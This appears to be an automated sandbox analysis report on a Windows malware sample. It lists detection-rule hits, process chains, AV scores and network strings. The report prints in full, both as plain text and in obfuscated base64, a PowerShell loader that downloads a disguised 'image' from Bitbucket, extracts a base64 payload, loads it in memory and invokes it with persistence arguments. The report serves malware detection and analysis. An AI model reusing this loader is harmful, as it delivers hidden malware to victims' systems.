Bz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J
Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c lol.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4340, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , ProcessId: 2328, ProcessName: wscript.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c lol.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4340, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , ProcessId: 2328, ProcessName: wscript.exe
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c lol.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4340, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , ProcessId: 2328, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\00wVZ1NU5b.exe, ProcessId: 6764, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { 
param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String
Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c lol.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4340, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , ProcessId: 2328, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp
@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J

        Data Obfuscation

        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; 
$shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String
        No Suricata rule has matched


        AV Detection

Source: 00wVZ1NU5b.exe, ReversingLabs: Detection: 15%
Source: 00wVZ1NU5b.exe, Virustotal: Detection: 16%, Perma Link
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\Desktop\00wVZ1NU5b.exe, Code function: 0_2_00007FF7E74F3214 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA, 0_2_00007FF7E74F3214
Source: unknown, HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: 00wVZ1NU5b.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wextract.pdb source: 00wVZ1NU5b.exe
Source: Binary string: wextract.pdbGCTL source: 00wVZ1NU5b.exe
Source: Binary string: corlib.pdbpdblib.pdbf"fh* source: powershell.exe, 00000007.00000002.2174893895.00000218A908A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbp source: powershell.exe, 00000007.00000002.2200132855.00000218C30AB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ib.pdbS source: powershell.exe, 00000007.00000002.2202017383.00000218C3434000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\00wVZ1NU5b.exe, Code function: 0_2_00007FF7E74F2034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00007FF7E74F2034

        Software Vulnerabilities

        Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: global traffic HTTP traffic detected: GET /dfghd/fgd/downloads/test.jpg?137113 HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
        Source: Joe Sandbox View IP Address: 185.166.143.49 185.166.143.49
        Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic HTTP traffic detected: GET /dfghd/fgd/downloads/test.jpg?137113 HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
        Source: global traffic DNS traffic detected: DNS query: bitbucket.org
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 01 Feb 2025 15:43:46 GMT Content-Type: text/html; charset=utf-8 Content-Length: 15017 Server: AtlassianEdge [...]
        Source: powershell.exe, 00000007.00000002.2202729046.00000218C34F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB8EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://go.micros
        Source: powershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AAE68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000005.00000002.2211178390.000001DB2C6DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AAC41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AAE68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://admin.atlassian.com
        Source: powershell.exe, 00000005.00000002.2211178390.000001DB2C691000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 00000005.00000002.2211178390.000001DB2C6AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AAC41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AC9B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218ACB58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 00000007.00000002.2175735528.00000218ACB7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AC032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218ACB58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.bitbucket.org
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atlassianblog.wpuser.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aui-cdn.atlassian.com/
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/entry/ad
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/entry/ap
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/entry/ve
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/themes/a
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/dist/webpack
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/img/default_
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/img/logos/bi
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/jsi18n/en/dj
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org
        Source: powershell.exe, 00000007.00000002.2200418834.00000218C3171000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/dfghd/fgd/downloads/tesb
        Source: powershell.exe, 00000005.00000002.2222459018.000001DB44B6A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2211178390.000001DB2CBF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2223008209.000001DB44CD2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AAC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2174751532.00000218A9000000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2174751532.00000218A9020000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2200132855.00000218C30AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AAE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175147045.00000218A90A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175340763.00000218A92A4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175666220.00000218AAC30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB5AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/gateway/api/emoji/
